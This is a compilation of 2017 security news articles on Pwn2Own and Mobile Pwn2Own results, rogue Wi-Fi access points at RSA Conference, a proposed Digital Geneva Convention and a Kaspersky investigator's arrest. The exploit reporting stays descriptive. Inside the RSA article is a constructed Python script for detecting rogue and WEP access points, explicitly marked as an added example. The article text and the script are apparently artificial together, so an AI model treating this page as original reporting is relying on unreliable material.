The hacking contest, organized by Trend Micro’s Zero Day Initiative (ZDI) at the PacSec conference in Tokyo, Japan, offered more than $500,000 for exploit chains targeting browsers, short distance communications (Wi-Fi, Bluetooth and NFC), messaging, and baseband components in the Google Pixel, Galaxy S8, iPhone 7 and Mate 9 Pro.

All devices had been running the latest versions of the software and operating systems – Apple, Google and Huawei released patches the night before the event started.

On the first day, participants earned a total of $350,000 for disclosing vulnerabilities that allow attacks against Internet Browser on the Galaxy S8, Safari on the iPhone 7, Wi-Fi on the iPhone 7, and the baseband on the Mate 9 Pro.

On the second day, MWR Labs earned $25,000 for hacking Google Chrome on the Mate 9 Pro via five logic bugs in Huawei apps that allowed a browser sandbox escape and data exfiltration.

The same team took home an additional $25,000 after exploiting 11 flaws across six different apps to hack Internet Browser on the Galaxy S8. The exploit resulted in arbitrary code execution and sensitive data leakage.

A researcher from China-based Qihoo 360 earned $20,000 for a partially successful exploit targeting the iPhone 7’s Wi-Fi component. The exploit worked properly, but one of the three vulnerabilities it leveraged had been previously disclosed at Pwn2Own by a different contestant. The same Chinese expert was awarded another $25,000 for hacking Safari on the iPhone 7.

The last entry came from the researcher Amat Cama (aka Acez), who earned $50,000 for a baseband exploit targeting the Galaxy S8. The exploit relied on a stack-based buffer overflow that allowed arbitrary code execution.

The total amount of money paid to researchers over the course of two days at Mobile Pwn2Own 2017 was $495,000. The Tencent Keen Security Lab team got the highest number of Master of Pwn points, which also earned them 65,000 ZDI reward points, worth roughly $25,000.

Mobile Pwn2Own 2017 results

While one successful entry did target the Chrome browser, no one attempted to demonstrate an exploit on Google’s Pixel phone.

Affected vendors have been provided the details of the vulnerabilities used at the event and ZDI will give them 90 days to release fixes before a limited advisory describing the flaws will be made public.


Samsung, Apple, Huawei Phones Hacked at Mobile Pwn2Own
1.11.2017 securityweek Congress
Researchers have managed to hack the Samsung Galaxy S8, the iPhone 7 and the Huawei Mate 9 Pro on the first day of the Mobile Pwn2Own 2017 competition taking place alongside the PacSec conference in Tokyo, Japan.

The prize pool for the event organized by Trend Micro’s Zero Day Initiative (ZDI) exceeds $500,000 and participants have already earned a significant chunk on the first day.

The day started with an attempt from Tencent Keen Security Lab to demonstrate an exploit against the Internet Browser on a Samsung Galaxy S8. The attempt could have earned them $70,000, but it failed.

However, a researcher from the Chinese security firm Qihoo360 did manage to hack the Internet Browser on the Galaxy S8 (with persistence) and take home the $70,000. The expert achieved code execution in the browser and exploited a privilege escalation in a different Samsung app for persistence after a reboot.

As for attacks targeting Apple’s iPhone 7 with iOS 11.1, the Tencent Keen Security Lab team earned $110,000 for a total of four vulnerabilities allowing code execution via Wi-Fi and privilege escalation for persistence through a reboot. The same team earned an additional $45,000 for hacking Safari on the iPhone 7.

Richard Zhu, aka fluorescence, earned $20,000 for a Safari exploit on an iPhone 7 and a sandbox escape.

The Tencent Keen Security Lab team also took a crack at the Huawei Mate 9 Pro. Researchers failed to hack the device’s NFC system, but they did manage to develop an exploit targeting the Android phone’s baseband, which earned them $100,000.

This brings the total earned by participants on the first day of Mobile Pwn2Own 2017 to $345,000.

No one attempted to hack Google’s Pixel phone or the company’s Chrome browser on the first day, but there are six more hacking attempts scheduled for the second day of the event.

The vulnerabilities exploited at the competition will be disclosed to Apple, Google, Samsung and Huawei, and they will be given 90 days to release a fix before limited details about the flaws are made public by ZDI.


Over $500,000 Up For Grabs at Mobile Pwn2Own 2017 Hacking Competition

30.8.2017 securityweek Congress
Trend Micro this week said that it will offer over $500,000 in cash prizes at Zero Day Initiative’s Mobile Pwn2Own contest, set to take place Nov. 1-2, during the PacSec 2017 Conference in Tokyo, Japan.

The sixth annual Mobile Pwn2Own competition will have four different targets available, namely Google Pixel, Samsung Galaxy S8, Apple iPhone 7, and Huawei Mate9 Pro, and will allow contestants to compete in four categories: Browsers, Short Distance and WiFi, Messaging, and Baseband.

Security researchers and hackers will be encouraged to demonstrate and disclose zero-day attacks against up-to-date (fully patched) mobile platforms. Should a new version of these phones become available in time to be integrated into the contest, Trend Micro and the Zero Day Initiative will work to add it as an available target platform.

In the Mobile Browser category, hackers and researchers will target Google Chrome, Apple Safari, and the Samsung Internet Browser, competing for prizes of $50,000, $40,000, and $30,000, respectively. In the Short Distance and WiFi category, attacks happening over Bluetooth, near field communication (NFC), or WiFi will be accepted, prized $40,000, $50,000, and $60,000, respectively.

Contestants in the Messaging category will be able to submit SMS or MMS exploits, each worth $60,000 in cash. Those competing in the Baseband category can win $100,000, the biggest prize in the competition.

“Following the contest, vendors will have 90 days to produce patches for these bugs, instead of the standard 120 disclosure window. This reflects the integrity of successful exploits produced during the contest. As these are practical vulnerabilities with demonstrated applications, a shortened patch window helps provide quicker protection for the end user against potentially damaging bugs,” Trend Micro notes.

The security firm also announced that successful entries will receive "Master of Pwn" points and the device itself for each attempt. The tradition of crowning a Master of Pwn will return this year, Trend Micro’s Brian Gorenc points out.

Gorenc also says that successful attempts will be eligible for a series of Add-on Bonuses, including a Kernel Bonus (the exploit payload must execute with kernel-level privileges) consisting of an extra $20,000 and an additional 3 Master of Pwn points, and a Persistence Bonus (the exploit payload can survive a reboot of the device), consisting of an additional $50,000 for iOS / $40,000 for Android, and an additional 3 Master of Pwn points.

There are also a series of penalties in place that contestants should be aware of. Those interested in participating are encouraged to read the complete set of rules for Mobile Pwn2Own 2017. Entrants should contact ZDI at zdi@trendmicro.com to begin the registration process.

“Since mobile devices are now ubiquitous, security flaws in these platforms are coveted by criminal elements and government agencies alike. Mobile Pwn2Own helps harden these devices and their OSes by revealing vulnerabilities and providing that research to the vendors. The goal is to get these bugs fixed before they’re actively exploited,” Gorenc said.


Hackers Earn $200,000 for VM Escapes at Pwn2Own 2017

20.3.2017 securityweek Congress
White hat hackers earned more than $250,000 for the vulnerabilities they disclosed on the third day of the Pwn2Own 2017 competition, including a couple of exploits that involved escaping VMware virtual machines.

Due to the unprecedented number of contestants and entries, Pwn2Own was extended to three days this year. On the third day, participants targeted the Microsoft Edge browser and VMware Workstation.

First, the 360 Security team earned $105,000 for hacking Edge and achieving a virtual machine (VM) escape. Experts leveraged a heap overflow in Edge, a type confusion in the Windows kernel and an uninitialized buffer flaw in VMware to complete the task.

Tencent Security’s Team Sniper earned $100,000 for a VMware Workstation exploit that can be used to escape VMs. The group leveraged a use-after-free in Windows, and information disclosure and uninitialized buffer flaws in VMware.

The Zero Day Initiative (ZDI) pointed out that a complete exploit was not easy to pull off in this category due to the fact that VMware Tools was not installed in the guest operating system.

Richard Zhu, aka fluorescence, also targeted Edge, but he only earned $55,000 as his exploit chain did not result in a VM escape. The researcher leveraged two use-after-free vulnerabilities in Edge and a buffer overflow in the Windows kernel to escalate privileges to SYSTEM.

ZDI paid out a total of $833,000 for the 51 vulnerabilities disclosed at Pwn2Own 2017. In comparison, participants only earned $460,000 at last year’s event for 21 new flaws.

360 Security obtained the highest number of Master of Pwn points this year, earning them 65,000 ZDI points worth $25,000.

On the first day of Pwn2Own 2017, white hat hackers received $233,000 for hacking Edge, Safari, Ubuntu and Adobe Reader. On the second day of the competition, experts took home $340,000 for exploits targeting Windows, macOS, Firefox, Edge, Safari and Flash Player.


Welcome to Pwn2Own 2017 – Researchers hacked Adobe Reader, Edge, Ubuntu, and Safari
17.3.2017 securityaffairs Congress

Pwn2Own 2017 has started and, as usual, it is a great event to see hackers at work. On the first day, experts hacked Edge, Safari, Ubuntu, and Adobe Reader.
The Pwn2Own 2017 competition, held in Vancouver (Canada), has started; as usual, it is a great event to see hackers at work. On the first day, bug bounty hunters managed to hack Microsoft Edge, Safari, Ubuntu, and Adobe Reader.

Pwn2Own 2017

This is the 10th anniversary of the Pwn2Own hacking contest; it is arranged by Trend Micro and the Zero Day Initiative (ZDI), which introduced new exploit categories this year.

Eleven groups vie for a prize pool of $1 million; the products to hack are organized into five categories: virtual machine (VM) escapes, web browsers and plugins, local privilege escalation, enterprise applications, and server side.

On the first day, the participants earned a total of $233,000 for the exploits they disclosed.

The day started with the success of the researcher @mj0011sec from the Chinese security firm Qihoo360, who earned $50,000 for hacking Adobe Reader on Windows and won 6 Master of Pwn points for his team.

The hacker and his team exploited a JPEG2000 heap overflow in Adobe Reader, a Windows kernel info leak, and an RCE through an uninitialized buffer in the Windows kernel to take down Adobe Reader.

Zero Day Initiative (@thezdi), 7:53 PM - 15 Mar 2017: “Boom! @mj0011sec uses 1 #Adobe and 2 #Windows bugs to take down #Reader & earn $50K. Next up is #Safari. http://bit.ly/2mJMrpl #P2O”

Adobe Reader was also successfully hacked by members of Team Sniper from Tencent Security. The hackers exploited use-after-free and information disclosure flaws to achieve code execution, and a use-after-free in the kernel to obtain SYSTEM-level permissions. The team earned $25,000 for its exploits and 6 Master of Pwn points.

Mid-morning, researchers Samuel Groß (@5aelo) and Niklas Baumstark (@_niklasb) partially hacked Apple Safari with an escalation to root on macOS. The duo used a use-after-free (UAF) in Safari combined with three logic bugs and a null pointer dereference to exploit Safari and elevate to root on macOS. They also earned style points for displaying a special message on the targeted Mac’s Touch Bar; in total they earned $28,000 USD and 9 Master of Pwn points.


Niklas Baumstark (@_niklasb), 8:06 PM - 15 Mar 2017: “First team to pwn Safari on macOS with escalation to root at #pwn2own! Was a ton of fun to pull that off with @5aelo”

In the afternoon, the Chaitin Security Research Lab (@ChaitinTech) hacked Ubuntu Desktop by exploiting a Linux kernel heap out-of-bounds access; they earned $15,000 and 3 Master of Pwn points. This is the first Ubuntu Linux hack at Pwn2Own.

The same group achieved another success at the end of the day, hacking Apple Safari with an escalation to root on macOS.
The attack chained a total of six bugs, including an info disclosure in Safari, four different type confusion bugs in the browser, and a UAF in WindowServer. The team earned $35,000 and 11 points towards Master of Pwn.

The highest reward, $80,000, went to Tencent Security’s Team Ether for hacking Microsoft’s Edge browser by leveraging an arbitrary write bug in Chakra and a logic bug to escape the sandbox. The team also earned 10 points towards Master of Pwn.

Of course, there were also some failed attempts at Pwn2Own 2017: Tencent Security – Team Sniper (Keen Lab and PC Mgr), who targeted Google Chrome with a SYSTEM-level escalation, were not able to complete their exploit chain within the allotted time.

The researcher Richard Zhu (fluorescence), targeting Apple Safari with an escalation to root on macOS, also did not complete the exploit chain within the allotted time.

Team Ether had signed up to hack Windows as well, but withdrew the entry, as did the researcher Ralf-Philipp Weinmann, who had targeted Edge.


Pwn2Own 2017: Experts Hack Edge, Safari, Ubuntu

16.3.2017 securityweek Congress

Bug bounty hunters have managed to hack Microsoft Edge, Safari, Ubuntu and Adobe Reader on the first day of the Pwn2Own 2017 competition taking place these days alongside the CanSecWest conference in Vancouver, Canada.

The prize pool for this year’s event is $1 million and 11 teams have signed up to hack products in four categories. On the first day of the competition, participants earned a total of $233,000 for the exploits they disclosed.

A researcher from Chinese security firm Qihoo360 earned $50,000 for hacking Adobe Reader on Windows. The hacker leveraged remote code execution and information disclosure vulnerabilities in Windows, and a JPEG2000 heap overflow in Reader to complete the task.

Adobe Reader was also cracked by Team Sniper from Tencent Security, which exploited use-after-free and information disclosure flaws to achieve code execution, and a use-after-free in the kernel to obtain SYSTEM-level permissions. The team earned $25,000 for its exploits.

Researchers Samuel Groß and Niklas Baumstark earned $28,000 for hacking Apple’s Safari web browser using a combination of a use-after-free flaw, three logic bugs and a null pointer dereference. Their attempt was only partially successful, but they did earn style points for displaying a special message on the targeted Mac’s touch bar.

The Beijing-based Chaitin Security Research Lab earned $35,000 for gaining root access to a Mac through Safari. The team exploited six flaws, including one information disclosure, four type confusions and a use-after-free.

The same team also successfully hacked Ubuntu Desktop via a heap out-of-bounds access in the Linux kernel, which earned them $15,000. It’s worth noting that this is the first Pwn2Own where participants get rewarded for finding local privilege escalation vulnerabilities.

The highest reward of the first day, $80,000, was earned by Tencent Security’s Team Ether, which managed to hack Microsoft’s Edge browser using an arbitrary write bug in Chakra and a logic bug to escape the sandbox.

Each of these contestants also earned Master of Pwn points, and the researcher or team with the highest total will receive 65,000 ZDI reward points, which are worth roughly $25,000.

Team Ether had signed up to hack Windows as well, but they withdrew the entry. Researcher Ralf-Philipp Weinmann, who targeted Edge, also withdrew his entry. Richard Zhu and Team Sniper failed to hack Safari and Google Chrome, respectively, in the allocated timeframe.


RSA Conference 2017 attendees hacked with rogue access points
19.2.2017 securityaffairs Congress

Experts at Pwnie Express discovered multiple rogue access points on the show floor that were used to hack the RSA conference attendees.
The news is very curious: the attendees at the 2017 RSA conference, one of the world’s largest security events, may have been hacked.

Security researchers at Pwnie Express were scanning the conference floor when they discovered rogue access points (an EvilAP attack) posing as known and trusted networks.

“Security testing vendor Pwnie Express has been passively scanning the airwaves on the RSA Conference show floor and has found multiple instances of EvilAP attacks,” reads a blog post published by EsecurityPlanet.com. “In an EvilAP attack, a rogue access point uses a Karma attack to trick users into thinking they are connecting to a known access point. Among the access point beacons sent out in the EvilAP attacks at the RSA Conference are common locations like Starbucks and McDonald’s.”

The pen testers at Pwnie Express confirmed that multiple users connected to a rogue access point and at least two remained connected over the course of more than a day.

RSA conference attendees hacked

According to Pwnie Express, there were also multiple Wi-Fi access points running on the RSA Conference show floor that used WEP encryption … and, as you know, WEP networks are quite simple to break.

The experts at Pwnie Express highlight the risks of connecting to a rogue access point: an attacker can set it up to gain “full control of all information going into and out of the device.”

A rogue access point could also be used to deliver malicious code on the user device and launch man-in-the-middle (MITM) attacks.
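As an added example (not code from Pwnie Express or the original article), the following Python script applies the defensive side of the points above to a constructed Wi-Fi scan log: it flags a BSSID that answers probe requests for many SSIDs it never beacons (the Karma signature behind an EvilAP), flags a trusted SSID served from an unknown BSSID or with downgraded security, and lists WEP networks. The Observation record layout, the sample frames and the TRUSTED allow-list are assumptions made for the example; in practice the observations would come from a monitor-mode capture of beacon and probe-response frames.

```python
"""Rogue-AP (EvilAP / Karma) and weak-encryption detection over scan observations.

Example code added for illustration; the input format and all values below are
constructed, not taken from the RSA Conference 2017 incident.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Observation:
    bssid: str      # transmitter MAC address of the access point
    ssid: str       # network name carried in the frame
    frame: str      # "beacon" or "probe_resp"
    security: str   # "OPEN", "WEP" or "WPA2" (simplified)


# Constructed sample capture: a legitimate conference AP, a Karma-style rogue AP
# that answers probes for whatever SSID a client asks for, and a WEP booth network.
SAMPLE = [
    Observation("AA:BB:CC:00:00:01", "RSAC2017", "beacon", "WPA2"),
    Observation("AA:BB:CC:00:00:01", "RSAC2017", "probe_resp", "WPA2"),
    Observation("DE:AD:BE:EF:00:10", "Starbucks", "probe_resp", "OPEN"),
    Observation("DE:AD:BE:EF:00:10", "McDonalds Free WiFi", "probe_resp", "OPEN"),
    Observation("DE:AD:BE:EF:00:10", "attwifi", "probe_resp", "OPEN"),
    Observation("DE:AD:BE:EF:00:10", "RSAC2017", "probe_resp", "OPEN"),
    Observation("11:22:33:44:55:66", "BoothDemo", "beacon", "WEP"),
]

# Constructed allow-list of the networks the venue actually operates.
TRUSTED = {"RSAC2017": {"bssids": {"AA:BB:CC:00:00:01"}, "security": "WPA2"}}


def karma_suspects(observations, min_ssids=3):
    """BSSIDs that answer probe requests for several SSIDs they never beacon.

    A normal AP answers probes only for the SSIDs it is configured to serve, so
    its beaconed and probe-response SSIDs coincide. A Karma-style rogue AP
    answers every directed probe with the requested SSID, so one BSSID fans out
    to many probe-only SSIDs. Returns {bssid: sorted probe-only SSIDs}.
    """
    beaconed = defaultdict(set)
    probed = defaultdict(set)
    for o in observations:
        target = beaconed if o.frame == "beacon" else probed
        target[o.bssid].add(o.ssid)
    suspects = {}
    for bssid, ssids in probed.items():
        probe_only = ssids - beaconed.get(bssid, set())
        if len(probe_only) >= min_ssids:
            suspects[bssid] = sorted(probe_only)
    return suspects


def evil_twins(observations, trusted):
    """Frames carrying a trusted SSID from an unknown BSSID or with other security.

    Catches an impersonator that re-uses the venue's network name, including the
    common downgrade from WPA2 to an open network. Returns sorted unique
    (bssid, ssid, security) tuples.
    """
    hits = set()
    for o in observations:
        expected = trusted.get(o.ssid)
        if expected is None:
            continue
        if o.bssid not in expected["bssids"] or o.security != expected["security"]:
            hits.add((o.bssid, o.ssid, o.security))
    return sorted(hits)


def weak_encryption(observations):
    """(bssid, ssid) pairs still using WEP, whose keys are trivially recoverable."""
    return sorted({(o.bssid, o.ssid) for o in observations if o.security == "WEP"})


def report(observations, trusted):
    """Run all three checks and return their findings keyed by check name."""
    return {
        "karma": karma_suspects(observations),
        "evil_twin": evil_twins(observations, trusted),
        "wep": weak_encryption(observations),
    }


if __name__ == "__main__":
    for check, findings in report(SAMPLE, TRUSTED).items():
        print(f"{check}: {findings}")
```

The thresholds and allow-list are deliberately simple; a venue would tune min_ssids to its own environment and populate TRUSTED from the network team's inventory.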


Microsoft Calls for Cyber Geneva Convention

17.2.2017 securityweek Congress
Brad Smith Keynote at RSA Conference 2017

The modern digital world is as much characterized by nation-sponsored cyber-attacks as it is by criminal cyber-attacks – and Microsoft is calling for an international cyber Geneva Convention to protect business, users and critical infrastructure before it spirals out of control.

In a blog post this week, President and Chief Legal Officer Brad Smith describes the need for a Digital Geneva Convention “that will commit governments to protecting civilians from nation-state attacks in times of peace.” Within this model, he sees the tech industry as ‘a neutral Digital Switzerland’ occupying the role of the Red Cross. It is a popularized re-working of arguments presented in Scott Charney’s June 2016 paper, An organizing model for cybersecurity norms development.

Smith also spoke at this week's RSA Conference in San Francisco on the topic.

Smith believes that the time is right. “Just as the world’s governments came together in 1949 to adopt the Fourth Geneva Convention to protect civilians in times of war, we need a Digital Geneva Convention that will commit governments to implement the norms that have been developed to protect civilians on the internet in times of peace.”

Key to this idea will be an international adoption of norms; that is, shared expectations of appropriate behavior. Various organizations have been working on such norms. “UN GGE, G20, US-Sino bilateral agreement all have worked toward shaping the appropriate and mutually agreed-upon behavior in the digital domain,” explains Andrea Limbago, Chief Social Scientist at Endgame and formerly Senior Technical Lead at the Joint Warfare Analysis Center.

“Are we at the beginning of a sea change in what the international community decides is acceptable behavior?” asked Jeff Moss, founder of Black Hat and DEF CON in September, 2016. “It doesn’t have to be a treaty; it can just be a norm. The next administration is going to have to drive those norms of behavior.”

But Brad Smith goes to the next step. He is arguing for just such an international treaty loosely modelled on the Fourth Geneva Convention. Is such a treaty feasible? It would require the international adoption of norms of behavior, coupled with the ability to definitively attribute wrongdoing.

Norms

Smith explains that the norms underpinning his convention “should commit governments to avoiding cyber-attacks that target the private sector or critical infrastructure or the use of hacking to steal intellectual property. Similarly, it should require that governments assist private sector efforts to detect, contain, respond to and recover from these events, and should mandate that governments report vulnerabilities to vendors rather than stockpile, sell or exploit them.”

The first two elements are uncontroversial: governments should not attack other nations, and governments should assist the private sector in recovering from such attacks. The third, however, is difficult: it commits governments to effective cyber weapon disarmament.

The US/China bilateral agreement in late 2015 is cited as the green shoots of norms development. The two countries “made important progress in 2015 to ban intellectual property cyber-theft.” Noticeably, however, while commercial espionage was banned, political espionage was omitted. Smith’s norms, however, would effectively neutralize government agencies’ ability to hack and spy.

The US/China agreement ultimately led to several countries, including the US, voluntarily adopting ‘norms of state behavior in cyberspace’, explains Phil Quade, currently CISO at Fortinet but previously executive manager at the Department of Defense. “These norms,” he explains, “helped to establish guidelines like not stealing intellectual property for commercial gain, not attacking critical infrastructure, not using CERTs for offensive actions, and cooperating with government law enforcement in their cybercrime investigations.” But, he added, they are “designed to exclude government intelligence activities.”

“Nation states have invested too much time, attention and money into cyber warfare and espionage machines to turn back the dial,” warns Eric O’Neill, currently Carbon Black's National Security Strategist, but formerly a member of the FBI’s Special Surveillance Group. It is unlikely that governments will include themselves in the norms they might otherwise endorse.

Attribution

Accurate attribution is essential for the effective operation of norms. Without it, there would be nothing to stop individual nations flouting them with impunity. “Cyberespionage,” says O’Neill, “relies on the difficulty of attribution, anonymity, and ease of access from anywhere in the world. When the U.S. has caught Russia, North Korea, Iran and China spying, probing our critical infrastructure, attacking our business, and stealing our data, each country staunchly denied the acts.”

Put simply, irrefutable technical attribution is impossible. But based on accumulated intelligence – from SIGINT, field agents, geopolitical analysis and more – one nation’s intelligence community can definitively attribute attackers, but only to its own government. It will not reveal full information on its methods of attribution to foreign countries, leaving continuing room for doubt.

Smith’s, and indeed, Charney’s, solution is an independent international committee of experts. “In addition,” wrote Smith, “a Digital Geneva Convention needs to create an independent organization that spans the public and private sectors. Specifically, the world needs an independent organization that can investigate and share publicly the evidence that attributes nation-state attacks to specific countries.”

There are two problems here: firstly, can such an organization succeed in genuine attribution without full intelligence community cooperation; and secondly, will all nations accept that attribution? “I think the logistics that would need to be involved to somehow accurately monitor and identify who is doing what to who is nearly impossible,” comments Nathan Wenzler, chief security strategist at AsTech; “especially considering the ease in which a malicious actor can hide, obfuscate, redirect, bluff and otherwise mislead where they're performing attacks from. For an organization like this to be successful, accurate proof which all parties involved can agree is correct would be the key. But the very nature of technology today would make that difficult at best. And even if you can monitor all traffic accurately, there would still be difficulty in getting the political factions involved to agree with the findings.”

Cyber Geneva Convention

A cyber Geneva Convention (that is, the formalization of agreed norms and accurate attribution into a binding international treaty) seems unlikely. Even beyond attribution, how do you sanction nations that have flouted the norms? As Phil Quade comments, “Rogue governments tend not to pay much attention to ‘norms of behavior’.”

A treaty would require teeth. “Any plausible Cyber Geneva Convention would require agreement on sanctions for a nation member that violates the convention,” says O’Neill. “Because attribution is extraordinarily difficult, these penalties may lack teeth if the convention cannot enforce them.”

There are other problems. Quade again: “The norms are for a peacetime environment, yet the boundaries for what constitutes peacetime or wartime in cyberspace are rarely clear.”

There can be little doubt that the path to an international convention on norms of acceptable cyber behavior is difficult, if not impossible; yet it remains a dream worth pursuing. Andrea Limbago suggests the world is currently caught between the impossibility of a convention and the distinct need for one.

“In the near and even mid-term,” she said, “a digital Geneva Convention is neither feasible nor likely, but that does not detract from the necessity to pursue forums and agreements to shape those proper guardrails of behavior within the digital domain; that is, norms. Basically, there is an urgent need for working toward those same goals, while a Geneva Convention remains years, decades away if it will ever occur.”

She believes that the internet is at an inflection point, poised between what she describes as multi-stakeholder and cyber sovereignty. Keys to the former are global internet freedoms, a balance between security and privacy, social integration and an understanding of what is ‘off limits’.

The latter is complete economic, social and political government control of the internet within national boundaries. It is disguised as nationalism and typified by surveillance, censorship, propaganda and disinformation. And it is already happening in Russia, China, Iran and elsewhere. Even the United Kingdom can now be described as a surveillance state with the sweeping powers given to law enforcement and intelligence agencies via the Investigatory Powers Act.

The balkanization of the internet is already in progress. It will be a problem and a difficulty for individuals; but it could prove a disaster for the large international companies currently operating across national boundaries – such as Microsoft. Internationally agreed norms of acceptable cyber behavior ultimately leading to a cyber convention could maintain and improve the democratic nature of the multi-stakeholder global internet.


Russia arrested Ruslan Stoyanov, the head of the investigation unit at Kaspersky Lab, in ‘Treason Probe’
25.1.2017 securityaffairs Congress

Russian authorities arrested Ruslan Stoyanov, the head of the investigation unit at Kaspersky Lab, in a ‘Treason Probe’.
Sad news is shaking the IT security industry: the Russian authorities have arrested Ruslan Stoyanov, one of the most important cybercrime investigators working for Kaspersky Lab.

Ruslan Stoyanov is the head of the investigation unit at Kaspersky Lab; according to the security firm, he is under investigation for a period predating his employment at Kaspersky Lab. Stoyanov was involved in every big anti-cybercrime operation in Russia in past years, including the one against the members of the Lurk cybercrime gang.

“This case is not related to Kaspersky Lab. Ruslan Stoyanov is under investigation for a period predating his employment at Kaspersky Lab,” reported Forbes citing a Kaspersky spokesperson’s statement. “We do not possess details of the investigation. The work of Kaspersky Lab’s Computer Incidents Investigation Team is unaffected by these developments.”

According to Kommersant, the arrest may be linked to the investigation into Sergei Mikhailov, deputy head of the information security department of the FSB (the Russian national security service).

Stoyanov and Mikhailov were both arrested in December; according to Kommersant, the investigation was exploring the receipt of money from foreign companies by Stoyanov and his links to Mikhailov.

The case appears to be very important; according to a source quoted by FORBES, the details of the investigation were likely to remain private.
“A Russia-based information security source told FORBES the details of the case were likely to remain private. The case has been filed under article 275 of Russia’s criminal code, the source said, meaning it should result in a secret military tribunal. Article 275 allows the government to prosecute when an individual provides assistance to a foreign state or organization regarding “hostile activities to the detriment of the external security of the Russian Federation” (translation from source). According to the source, this can be applied broadly. For instance, furnishing the FBI with information on a botnet may amount to treason.” reported FORBES.

Who is Stoyanov?

Before Stoyanov joined Kaspersky in 2012, he served six years as a major in the Ministry of Interior’s cybercrime unit, between 2000 and 2006, before moving into the private sector.

FORBES was also informed that, while Ruslan Stoyanov was working for the Russian government, he was the lead investigator into a hacker crew that extorted $4 million from U.K. betting shops under threat of DDoS attacks.

Three members of the cyber gang were identified and arrested by the investigators.

Stay tuned.